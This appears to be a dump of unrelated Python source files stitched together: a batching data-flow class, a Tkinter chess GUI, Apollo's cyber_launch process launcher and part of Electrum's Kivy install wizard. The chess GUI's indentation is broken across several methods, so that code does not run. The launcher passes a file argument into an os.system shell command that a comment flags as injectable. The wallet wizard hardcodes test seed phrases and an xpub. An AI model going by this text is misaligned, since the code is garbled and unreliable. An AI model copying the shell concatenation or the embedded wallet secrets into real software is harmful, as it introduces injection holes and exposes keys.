            if ids is False:
                break
            self.batch_ids_queue.put(ids)

    def next_batch_ids(self):
        """Return the sample indices of the next batch, or False at the
        end of an epoch when not in continuous mode."""
        self.batch_index += 1
        if self.batch_index == len(self.batches):
            if not self.continuous:
                self.stop()
                return False
            # Continuous mode: reshuffle (if enabled) and start a new epoch.
            self.reset_batches()
        batch_start, batch_end = self.batches[self.batch_index]
        return self.index_array[batch_start:batch_end]

    def retrieve_data(self, batch_ids):
        """Slice every value in feed_dict down to the given sample ids."""
        feed_batch = {}
        for key in self.feed_dict:
            feed_batch[key] = \
                utils.slice_array(self.feed_dict[key], batch_ids)
        return feed_batch

    def reset_batches(self):
        """Start a fresh epoch: optionally reshuffle, rebuild batch spans."""
        if self.shuffle:
            self.shuffle_samples()
        # Generate new batches
        self.batches = self.make_batches()
        self.batch_index = -1

    def make_batches(self):
        """Return (start, end) spans covering n_samples in batch_size steps."""
        return utils.make_batches(self.n_samples, self.batch_size)

    def shuffle_samples(self):
        """Shuffle the sample index array in place."""
        np.random.shuffle(self.index_array)

    def wait_for_threads(self):
        # Wait for threads to finish computation.
        # NOTE(review): the original comment said "max 120s", but
        # coord.join is called without a timeout here — confirm intent.
        self.coord.join(self.threads)
        # Send end signal to indicate no more data in feed queue
        self.feed_dict_queue.put(False)

    def clear_queues(self):
        """ clear_queues.

        Clear queues.
        """
        while not self.feed_dict_queue.empty():
            self.feed_dict_queue.get()
        while not self.batch_ids_queue.empty():
            self.batch_ids_queue.get()
class TFRecordsFlow(DataFlow):
    """Placeholder for a TFRecords-backed data flow; not implemented."""

    def __init__(self, coord):
        super(TFRecordsFlow, self).__init__(coord)
        raise NotImplementedError
class DataFlowStatus(object):
    """ Data Flow Status

    Tracks how many batches (steps), samples, and epochs have been
    consumed from a data flow.
    """

    def __init__(self, batch_size, n_samples):
        self.batch_size = batch_size
        self.n_samples = n_samples
        self.step = 0
        self.epoch = 0
        self.current_iter = 0

    def update(self):
        """Advance one step; roll to the next epoch once the dataset is
        exhausted (step resets, epoch increments)."""
        self.step += 1
        self.current_iter = min(self.step * self.batch_size, self.n_samples)
        if self.current_iter == self.n_samples:
            self.epoch += 1
            self.step = 0

    def reset(self):
        """Zero step and epoch counters (current_iter is left untouched)."""
        self.step = 0
        self.epoch = 0
|
gui_tkinter.py | import board
import pieces
import os
from multiprocessing import Process, Queue
import Tkinter as tk
from PIL import Image, ImageTk
import time
turn = 0
flag = 0
class BoardGuiTk(tk.Frame):
# ---- shared class-level defaults for BoardGuiTk ----
pieces = {}            # canvas item name -> placement state
selected = None        # NOTE(review): not referenced in the visible methods — confirm use
selected_piece = None  # (piece, position) of the piece picked by a click
hilighted = None       # squares to highlight as legal destinations
icons = {}             # cached piece images
color1 = "white"       # light-square color
color2 = "grey"        # dark-square color
rows = 8
columns = 8

@property
def canvas_size(self):
    # Pixel (width, height) of the full board canvas.
    return (self.columns * self.square_size,
            self.rows * self.square_size)
def __init__(self, parent, chessboard, square_size=64):
    """Build the board canvas and the status bar with its buttons.

    parent: parent Tk widget; chessboard: board model object;
    square_size: edge length of one square in pixels.
    """
    # print "Init"
    self.chessboard = chessboard
    self.square_size = square_size
    self.parent = parent

    canvas_width = self.columns * square_size
    canvas_height = self.rows * square_size

    tk.Frame.__init__(self, parent)
    self.canvas = tk.Canvas(self, width=canvas_width, height=canvas_height, background="grey")
    self.canvas.pack(side="top", fill="both", anchor="c", expand=True)
    # Redraw on resize; select/move pieces on left click.
    self.canvas.bind("<Configure>", self.refresh)
    self.canvas.bind("<Button-1>", self.click)
    # self.canvas.bind("<Button-1>", callback)

    self.statusbar = tk.Frame(self, height=64)
    self.button_quit = tk.Button(self.statusbar, text="New", fg="black", command=self.reset)
    self.button_quit.pack(side=tk.LEFT, in_=self.statusbar)

    self.button_save = tk.Button(self.statusbar, text="Save", fg="black", command=self.chessboard.save_to_file)
    self.button_save.pack(side=tk.LEFT, in_=self.statusbar)

    # NOTE(review): command=self.move_engine — no method of that name is
    # visible here (only engine_move); confirm move_engine exists later
    # in the class.
    self.button_move = tk.Button(self.statusbar, text="Engine Move", fg="black", command=self.move_engine)
    self.button_move.pack(side=tk.LEFT, in_=self.statusbar)

    self.label_status = tk.Label(self.statusbar, text=" White's turn ", fg="black")
    self.label_status.pack(side=tk.LEFT, expand=0, in_=self.statusbar)

    # NOTE(review): self.button_quit is reassigned here, so the "New"
    # button above is no longer reachable through this attribute.
    self.button_quit = tk.Button(self.statusbar, text="Quit", fg="black", command=self.parent.destroy)
    self.button_quit.pack(side=tk.RIGHT, in_=self.statusbar)
    self.statusbar.pack(expand=False, fill="x", side='bottom')
def click(self, event):
    """Handle a left click: move the selected piece, or select/highlight.

    Updates the module-level `turn` and `flag` globals when a move is made.
    """
    # self.refresh()
    # print "Click"

    # Figure out which square we've clicked
    global flag
    global turn
    col_size = row_size = event.widget.master.square_size
    # NOTE(review): relies on Python 2 integer division for `/` on ints;
    # under Python 3 these would be floats — confirm target interpreter.
    current_column = event.x / col_size
    current_row = 7 - (event.y / row_size)

    position = self.chessboard.letter_notation((current_row, current_column))
    # print position
    # print self.selected_piece
    # piece = self.chessboard[position]

    if self.selected_piece:
        # Second click: attempt the move, then clear selection and redraw.
        self.move(self.selected_piece[1], position)
        # print "moved"
        turn = 1
        self.selected_piece = None
        self.hilighted = None
        self.pieces = {}
        self.refresh()
        self.draw_pieces()
        flag=1
        # Process(target=self.engine_move).start()
        # self.engine_move()
    if position is not None:
        self.hilight(position)
    self.refresh()
def engine_move(self):
    """Ask the external engine executable for a move and apply it.

    Exports the current board to curr_board.in, runs a.exe, reads the
    chosen move from inp.in (first two chars = source square, rest =
    destination), then plays it and redraws.

    NOTE(review): all paths are absolute, machine-specific Windows paths —
    parameterize before reuse.
    """
    # time.sleep(2)
    var = open("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\curr_board.in","w")
    print self.chessboard.export()
    var.write(self.chessboard.export())
    var.close()
    # os.system("g++ C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\bing.cpp")
    # time.sleep(5)
    print(os.system("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\a.exe"))
    # time.sleep(5)
    var = open("C:\\Users\\dhrum\\Downloads\\Simple-Python-Chess-master-20190308T062157Z-001\\Simple-Python-Chess-master\\inp.in","r")
    str1 = ""
    str2 = ""
    # Last line of the file wins.
    for xx in var:
        str1 = xx[:2]
        str2 = xx[2:]
    var.close()
    self.chessboard.move(str1, str2)
    self.selected_piece = None
    self.hilighted = None
    self.pieces = {}
    self.refresh()
    self.draw_pieces()
def move(self, p1, p2):
# print "move"
global turn
piece = self.chessboard[p1]
dest_piece = self.chessboard[p2]
if dest_piece is None or dest_piece.color != piece.color:
try:
self.chessboard.move(p1, p2)
except board.ChessError as error:
self.label_status["text"] = error.__class__.__name__
else:
self.label_status["text"] = \
" " + piece.color.capitalize() +": "+ p1 + p2
# self.refresh()
# self.draw_pieces()
# self.chessboard.make_move("black")
# self.selected_piece = None
# self.hilighted = None
# self.pieces = {}
# self.refresh()
# self.draw_pieces()
def hilight(self, pos):
# print "hilight"
piece = self.chessboard[pos]
# print piece
if piece is not None and (piece.color == self.chessboard.player_turn):
self.selected_piece = (self.chessboard[pos], pos)
self.hilighted = map(self.chessboard.number_notation, (self.chessboard[pos].possible_moves(pos)))
    def addpiece(self, name, image, row=0, column=0):
        '''Add a piece to the playing board.

        Creates the canvas image item (tagged both with its own name and
        the shared "piece" tag) and positions it via placepiece.
        '''
        self.canvas.create_image(0, 0, image=image, tags=(name, "piece"), anchor="c")
        self.placepiece(name, row, column)
def placepiece(self, name, row, column):
# print "placepiece"
'''Place a piece at the given row/column'''
# print name
# print row
# print column
# print "--"
self.pieces[name] = (row, column)
x0 = (column * self.square_size) + int(self.square_size/2)
y0 = ((7-row) * self.square_size) + int(self.square_size/2)
self.canvas.coords(name, x0, y0)
def refresh(self, event={}):
global flag
'''Redraw the board'''
# print "refresh"
# # self.engine_move()
if event:
xsize = int((event.width-1) / self.columns)
ysize = int((event.height-1) / self.rows)
self.square_size = min(xsize, ysize)
self.canvas.delete("square")
color = self.color2
for row in range(self.rows):
color = self.color1 if color == self.color2 else self.color2
for col in range(self.columns):
x1 = (col * self.square_size)
y1 = ((7-row) * self.square_size)
x2 = x1 + self.square_size
y2 = y1 + self.square_size
if (self.selected is not None) and (row, col) == self.selected:
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill="orange", tags="square")
elif (self.hilighted is not None and (row, col) in self.hilighted):
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill="spring green", tags="square")
else:
self.canvas.create_rectangle(x1, y1, x2, y2, outline="black", fill=color, tags="square")
color = self.color1 if color == self.color2 else self.color2
for name in self.pieces:
self.placepiece(name, self.pieces[name][0], self.pieces[name][1])
self.canvas.tag_raise("piece")
self.canvas.tag_lower("square")
    def draw_pieces(self):
        """Create a canvas image item for every piece currently on the board."""
        global flag
        self.canvas.delete("piece")
        # NOTE(review): dict.iteritems() is Python 2 only -- this file is
        # Python 2 code (print statements elsewhere).
        for coord, piece in self.chessboard.iteritems():
            x,y = self.chessboard.number_notation(coord)
            if piece is not None:
                filename = "img/%s%s.png" % (piece.color, piece.abbriviation.lower())
                piecename = "%s%s%s" % (piece.abbriviation, x, y)
                # Cache PhotoImages: Tk stops drawing images whose Python
                # object gets garbage-collected.
                if(filename not in self.icons):
                    self.icons[filename] = ImageTk.PhotoImage(file=filename, width=32, height=32)
                self.addpiece(piecename, self.icons[filename], x, y)
                self.placepiece(piecename, x, y)
def move_engine(self):
# print "in move_engine"
global turn
if turn is 1:
self.chessboard.make_move("black")
self.pieces = {}
self.refresh()
self.draw_pieces()
turn = 0
    def reset(self):
        """Restore the standard starting position and redraw everything."""
        self.chessboard.load(board.FEN_STARTING)
        self.refresh()
        self.draw_pieces()
        # Second refresh restacks squares/pieces after draw_pieces.
        self.refresh()
def display(chessboard):
    """Build the Tk window around *chessboard* and run the GUI.

    Blocks in root.mainloop() until the window is closed.
    :param chessboard: board model consumed by BoardGuiTk.
    """
    root = tk.Tk()
    root.title("Chess Engine")
    gui = BoardGuiTk(root, chessboard)
    gui.pack(side="top", fill="both", expand="true", padx=4, pady=4)
    gui.draw_pieces()
    root.mainloop()
if __name__ == "__main__":
    # BUG FIX: display() requires a chessboard argument (see its def above);
    # calling it bare raised TypeError. Presumably board.Board holds the
    # game state -- TODO confirm the constructor signature against the
    # board module.
    display(board.Board(board.FEN_STARTING))
|
cyber_launch.py | #!/usr/bin/env python3
# ****************************************************************************
# Copyright 2018 The Apollo Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
import argparse
import atexit
import logging
import os
import os.path
import signal
import subprocess
import sys
import time
import threading
import traceback
import xml.etree.ElementTree as ET
g_binary_name = 'mainboard'
g_pwd = os.getcwd()
g_script_name = os.path.basename(sys.argv[0]).split(".")[0]
g_process_pid = os.getpid()
g_process_name = g_script_name + "_" + str(g_process_pid)
cyber_path = os.getenv('CYBER_PATH')
"""
colorful logging
"""
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = list(range(8))
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"
BOLD_SEQ = "\033[1m"
COLORS = {
'INFO': GREEN,
'WARNING': YELLOW,
'DEBUG': BLUE,
'ERROR': RED,
'CRITICAL': YELLOW
}
class ColoredFormatter(logging.Formatter):
    """logging.Formatter that wraps the level column and message in ANSI
    color sequences (per-level colors from COLORS)."""

    def __init__(self, msg):
        logging.Formatter.__init__(self, msg)

    def format(self, record):
        levelname = record.levelname
        if levelname in COLORS:
            if levelname == 'DEBUG':
                # DEBUG records come from module_monitor as "name# line":
                # the part before '#' fills the level column, the part
                # after it becomes the message.
                record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
                    record.msg.split('#')[0] + RESET_SEQ
                record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + \
                    record.msg.split('#')[-1] + RESET_SEQ
            else:
                # Other levels show this launcher's process name in the
                # level column and prefix the message with the level.
                record.levelname = COLOR_SEQ % (30 + COLORS[levelname]) + \
                    g_process_name + RESET_SEQ
                record.msg = COLOR_SEQ % (30 + COLORS[levelname]) + levelname + \
                    " " + record.msg.split('#')[-1] + RESET_SEQ
        # NOTE(review): record.msg/levelname are mutated in place, so a
        # second handler would see already-colored text -- appears to rely
        # on the single console handler configured below; confirm.
        return logging.Formatter.format(self, record)
color_formatter = ColoredFormatter("[%(levelname)-18s] %(message)s")
console = logging.StreamHandler()
console.setFormatter(color_formatter)
logger = logging.Logger(__name__)
logger.addHandler(console)
def exit_handler():
    """atexit hook: stop all child processes, restore the original cwd
    (main() chdirs into CYBER_PATH), and log the exit."""
    stop()
    os.chdir(g_pwd)
    logger.info('cyber_launch exit.')


atexit.register(exit_handler)
def singleton(cls):
    """Class decorator: every call of the decorated name returns one
    shared instance of *cls*, constructed lazily on first use.

    Note: constructor arguments of any call after the first are ignored.
    """
    cache = {}

    def get_instance(*args, **kwargs):
        if cls not in cache:
            cache[cls] = cls(*args, **kwargs)
        return cache[cls]

    return get_instance
def module_monitor(mod):
    """Daemon-thread loop: forward a child's stdout lines to the logger.

    Runs forever (relies on being a daemon thread to die with the
    launcher); blocks on readline, sleeping briefly when the pipe is idle.
    :param mod: ProcessWrapper whose popen.stdout is drained.
    """
    while True:
        line = mod.popen.stdout.readline()
        if line:
            # '#' separates name and text for ColoredFormatter's DEBUG path.
            logger.debug('%s# %s' % (mod.name, line.decode('utf8').strip('\n')))
            continue
        time.sleep(0.01)
class ProcessWrapper(object):
    """Wraps one child process (a mainboard instance hosting dag files, or
    a raw binary command line).

    Tracks the Popen handle, liveness and exit state, and spawns a daemon
    thread that forwards the child's stdout to the logger.
    """

    def __init__(self, binary_path, dag_num, dag_list, process_name,
                 process_type, sched_name, exception_handler=''):
        self.time_of_death = None   # timestamp when death was first observed
        self.started = False
        self.binary_path = binary_path
        self.dag_num = dag_num
        self.dag_list = dag_list
        self.name = process_name
        self.sched_name = sched_name
        self.process_type = process_type
        self.popen = None
        self.exit_code = None
        self.args = []
        self.pid = -1
        self.exception_handler = exception_handler

    def wait(self):
        """Block until the child exits (no-op if it was never started)."""
        if self.started:
            self.popen.wait()

    def start(self):
        """
        Start a manager in process name.

        :return: 0 on success, 2 on failure to spawn.
        """
        if self.process_type == 'binary':
            # For binaries the whole command line lives in the name.
            args_list = self.name.split()
        else:
            args_list = [self.binary_path, '-d'] + self.dag_list
            if len(self.name) != 0:
                args_list.append('-p')
                args_list.append(self.name)
            if len(self.sched_name) != 0:
                args_list.append('-s')
                args_list.append(self.sched_name)
        self.args = args_list
        try:
            self.popen = subprocess.Popen(args_list, stdout=subprocess.PIPE,
                                          stderr=subprocess.STDOUT)
        except Exception as err:
            logger.error('Subprocess Popen exception: ' + str(err))
            return 2
        if self.popen.pid == 0 or self.popen.returncode is not None:
            logger.error('Start process [%s] failed.' % self.name)
            return 2
        th = threading.Thread(target=module_monitor, args=(self, ))
        # FIX: Thread.setDaemon() is deprecated; assign the attribute.
        th.daemon = True
        th.start()
        self.started = True
        self.pid = self.popen.pid
        logger.info('Start process [%s] successfully. pid: %d' %
                    (self.name, self.popen.pid))
        logger.info('-' * 120)
        return 0

    def is_alive(self):
        """
        Check the process if is still running
        @return: True if process is still running
        @rtype: bool
        """
        if not self.started:
            return False
        if self.popen is None:
            if self.time_of_death is None:
                self.time_of_death = time.time()
            return False
        self.exit_code = self.popen.poll()
        if self.exit_code is not None:
            if self.time_of_death is None:
                self.time_of_death = time.time()
            return False
        return True

    def get_exit_state(self):
        """Log a description of how the child exited (if it has exited)."""
        if self.popen.returncode is None:
            pass
        elif self.popen.returncode != 0:
            output = 'Process [%s] has died [pid %s, exit code %s, cmd %s].' % \
                (self.name, self.pid, self.exit_code, ' '.join(self.args))
            logger.error(output)
        else:
            output = 'Process [%s] has finished. [pid %s, cmd %s].' % \
                (self.name, self.pid, ' '.join(self.args))
            # FIX: a clean (returncode 0) exit is not an error; log at info.
            logger.info(output)
@singleton
class ProcessMonitor(object):
    """Singleton registry of every spawned ProcessWrapper.

    Polls liveness, applies each process' exception_handler policy
    ("respawn"/"exit"), and knows how to stop everything.
    """

    def __init__(self):
        self.procs = []        # registered ProcessWrapper objects
        self.dead_cnt = 0      # dead (non-binary) processes seen last check
        self.done = False
        self.is_shutdown = False

    def register(self, p):
        """
        Register process with L{ProcessMonitor}
        @param p: Process
        @type p: L{Process}
        """
        if self.has_process(p.name):
            logger.error(
                'Cannot add process due to duplicate name "%s".' % p.name)
        elif self.is_shutdown:
            logger.error(
                'Cannot add process [%s] due to monitor has been stopped.' % p.name)
        else:
            self.procs.append(p)

    def has_process(self, name):
        """
        @return: True if process is still be monitored. If False, process
        has died or was never registered with process
        @rtype: bool
        """
        return len([p for p in self.procs if p.name == name]) > 0

    def check_cleanup(self):
        """
        Check processes are alived, cleanup processes
        """
        dead_cnt = 0
        for pw in self.procs:
            if self.is_shutdown:
                break
            # Raw binaries are not health-checked; only mainboard instances.
            if pw.process_type == 'binary':
                continue
            try:
                if not pw.is_alive():
                    if pw.exception_handler == "respawn":
                        logger.warning(
                            'child process [%s][%d] exit, respawn!' % (pw.name, pw.pid))
                        result = pw.start()
                        if result != 0:
                            logger.error(
                                'respawn process [%s] failed, stop all!' % (pw.name))
                            stop()
                    elif pw.exception_handler == "exit":
                        logger.warning(
                            'child process [%s][%d] exit, stop all' % (pw.name, pw.pid))
                        stop()
                    dead_cnt += 1
            except Exception:
                dead_cnt += 1
                traceback.print_exc()
        if dead_cnt > 0:
            self.dead_cnt = dead_cnt
            # NOTE(review): binaries are skipped above, so with any
            # 'binary' process registered dead_cnt can never equal
            # len(self.procs) -- confirm whether that is intended.
            if self.dead_cnt == len(self.procs):
                self.is_shutdown = True

    def run(self):
        """
        Run processes monitor, until all processes are died.
        """
        while not self.is_shutdown:
            self.check_cleanup()
            time.sleep(0.2)
        for p in self.procs:
            p.get_exit_state()
        if self.dead_cnt == len(self.procs):
            logger.info("All processes has died.")
            return True
        return False

    def stop(self, signal):
        """
        Stop all processes in monitor
        """
        # NOTE(review): the parameter shadows the imported 'signal' module
        # inside this method body.
        for p in self.procs:
            if p.is_alive():
                p.popen.send_signal(signal)
        for p in self.procs:
            if p.is_alive():
                logger.warning('Waiting for [%s][%s] exit.' % (p.name, p.pid))
                p.wait()
            logger.info(
                'Process [%s] has been stopped. dag_file: %s' % (p.name, p.dag_list))
        # Reset members
        self.procs = []
        self.dead_cnt = 0
def _module_type(module):
    """Return a <module>'s <type> text, defaulting to 'library' when the
    tag is absent or empty."""
    node = module.find('type')
    text = node.text if node is not None else None
    if text is None:
        text = 'library'
    return text.strip()


def start(launch_file=''):
    """
    Start all modules described by the launch xml config.

    :param launch_file: absolute path, bare file name (resolved under
        $CYBER_PATH/launch), or path relative to the current directory.
    """
    pmon = ProcessMonitor()
    # Resolve the launch file location.
    if not launch_file:
        # FIX: previously an empty/None argument crashed on launch_file[0].
        logger.error('Cannot find launch file: %s ' % launch_file)
        sys.exit(1)
    if launch_file[0] == '/':
        pass  # already absolute
    elif launch_file == os.path.basename(launch_file):
        launch_file = os.path.join(cyber_path, 'launch', launch_file)
    else:
        if os.path.exists(os.path.join(g_pwd, launch_file)):
            launch_file = os.path.join(g_pwd, launch_file)
        else:
            logger.error('Cannot find launch file: %s ' % launch_file)
            sys.exit(1)
    logger.info('Launch file [%s]' % launch_file)
    logger.info('=' * 120)
    if not os.path.isfile(launch_file):
        logger.error('Launch xml file %s does not exist' % launch_file)
        sys.exit(1)
    try:
        tree = ET.parse(launch_file)
    except Exception:
        logger.error('Parse xml failed. illegal xml!')
        sys.exit(1)
    root = tree.getroot()

    # Pass 1: group dag files by process name, so one mainboard instance
    # can host several dags.
    dag_dict = {}
    for module in root.findall('module'):
        dag_conf = module.find('dag_conf').text
        process_name = module.find('process_name').text
        if _module_type(module) == 'binary':
            continue
        if dag_conf is None or not dag_conf.strip():
            logger.error('Library dag conf is null')
            continue
        if process_name is None:
            process_name = 'mainboard_default_' + str(os.getpid())
        process_name = process_name.strip()
        if str(process_name) not in dag_dict:
            dag_dict[str(process_name)] = [str(dag_conf)]
        else:
            dag_dict[str(process_name)].append(str(dag_conf))

    # Export <environment> variables before spawning any process.
    for env in root.findall('environment'):
        # FIX: Element.getchildren() was removed in Python 3.9;
        # iterating the element yields its children directly.
        for var in env:
            os.environ[var.tag] = str(var.text)

    # Pass 2: spawn one ProcessWrapper per distinct process name.
    process_list = []
    for module in root.findall('module'):
        module_name = module.find('name').text
        dag_conf = module.find('dag_conf').text
        process_name = module.find('process_name').text
        sched_name = module.find('sched_name')
        exception_handler = module.find('exception_handler')
        process_type = _module_type(module)
        if sched_name is None:
            sched_name = "CYBER_DEFAULT"
        else:
            sched_name = sched_name.text
        if process_name is None:
            process_name = 'mainboard_default_' + str(os.getpid())
        if dag_conf is None:
            dag_conf = ''
        if module_name is None:
            module_name = ''
        if exception_handler is None:
            exception_handler = ''
        else:
            exception_handler = exception_handler.text
        module_name = module_name.strip()
        dag_conf = dag_conf.strip()
        process_name = process_name.strip()
        sched_name = sched_name.strip()
        exception_handler = exception_handler.strip()
        logger.info('Load module [%s] %s: [%s] [%s] conf: [%s] exception_handler: [%s]' %
                    (module_name, process_type, process_name, sched_name, dag_conf,
                     exception_handler))
        if process_name not in process_list:
            if process_type == 'binary':
                if len(process_name) == 0:
                    logger.error(
                        'Start binary failed. Binary process_name is null.')
                    continue
                # FIX: exception_handler was previously passed positionally,
                # landing in the sched_name parameter slot; pass it by
                # keyword so respawn/exit policies are actually recorded.
                pw = ProcessWrapper(
                    process_name.split()[0], 0, [""], process_name,
                    process_type, "", exception_handler=exception_handler)
            # Default is library
            else:
                pw = ProcessWrapper(
                    g_binary_name, 0, dag_dict[str(process_name)], process_name,
                    process_type, sched_name, exception_handler)
            result = pw.start()
            if result != 0:
                logger.error(
                    'Start manager [%s] failed. Stop all!' % process_name)
                stop()
            pmon.register(pw)
            process_list.append(process_name)

    # No module in xml
    if not process_list:
        logger.error("No module was found in xml config.")
        return
    all_died = pmon.run()
    if not all_died:
        logger.info("Stop all processes...")
        stop()
    logger.info("Cyber exit.")
def stop(sig=signal.SIGINT):
    """Stop every monitored module, then exit the launcher.

    :param sig: signal forwarded to each child (default SIGINT).
    """
    monitor = ProcessMonitor()
    if not monitor.procs:
        # Nothing running (also makes the atexit hook a safe no-op).
        return
    monitor.stop(sig)
    logger.info('All processes have been stopped.')
    sys.exit(0)
def stop_launch(launch_file):
    """
    Interrupt running cyber_launch processes, then exit.

    With a launch_file, only launchers whose command line matches it are
    signalled; otherwise every cyber_launch process is.
    """
    # NOTE(review): launch_file is interpolated into a shell command line;
    # a crafted value could inject shell syntax -- consider
    # subprocess.run([...], shell=False) with a list argument.
    if launch_file:
        cmd = 'pkill -INT -f ' + launch_file
    else:
        cmd = 'pkill -INT cyber_launch'
    os.system(cmd)
    time.sleep(3)  # give the signalled launchers time to wind down
    logger.info('Stop cyber launch finished.')
    sys.exit(0)
def signal_handler(sig, frame):
    """SIGINT/SIGTERM handler: stop all child processes and exit."""
    logger.info('Keyboard interrupt received. Stop all processes.')
    stop(sig)
def main():
    """
    Entry point: parse the command line and dispatch to start/stop.

    Requires the CYBER_PATH environment variable; chdirs into it so
    relative launch paths resolve against the cyber installation.
    """
    if cyber_path is None:
        logger.error(
            'Error: environment variable CYBER_PATH not found, set environment first.')
        sys.exit(1)
    os.chdir(cyber_path)
    parser = argparse.ArgumentParser(description='cyber launcher')
    # FIX: record the chosen sub-command via dest instead of reading
    # sys.argv[1] directly, which raised IndexError when no argument
    # was given.
    subparsers = parser.add_subparsers(dest='command', help='sub-command help')
    start_parser = subparsers.add_parser(
        'start', help='launch/benchmark.launch')
    start_parser.add_argument('file', nargs='?', action='store',
                              help='launch file, default is cyber.launch')
    stop_parser = subparsers.add_parser(
        'stop', help='stop all the module in launch file')
    stop_parser.add_argument('file', nargs='?', action='store',
                             help='launch file, default stop all the launcher')
    params = parser.parse_args(sys.argv[1:])
    command = params.command
    if command == 'start':
        start(params.file)
    elif command == 'stop':
        stop_launch(params.file)
    else:
        logger.error('Invalid command %s' % command)
        sys.exit(1)
if __name__ == '__main__':
    # Install handlers first so Ctrl-C / kill trigger a clean stop of
    # all spawned children before the launcher itself exits.
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    main()
|
installwizard.py |
from functools import partial
import threading
import os
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum.base_wizard import BaseWizard
from electrum.util import is_valid_email
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_seed = "grape impose jazz bind spatial mind jelly tourist tank today holiday stomach"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<WizardConfirmDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
<WizardTOSDialog>
message : ''
size_hint: 1, 1
ScrollView:
size_hint: 1, 1
TextInput:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.minimum_height
text: root.message
disabled: True
<WizardEmailDialog>
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: 'Please enter your email address'
WizardTextInput:
id: email
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
<WizardKnownOTPDialog>
message : ''
message2: ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
WizardTextInput:
id: otp
on_text: Clock.schedule_once(root.on_text)
multiline: False
on_text_validate: Clock.schedule_once(root.on_enter)
Widget
size_hint: 1, 1
Label:
color: root.text_color
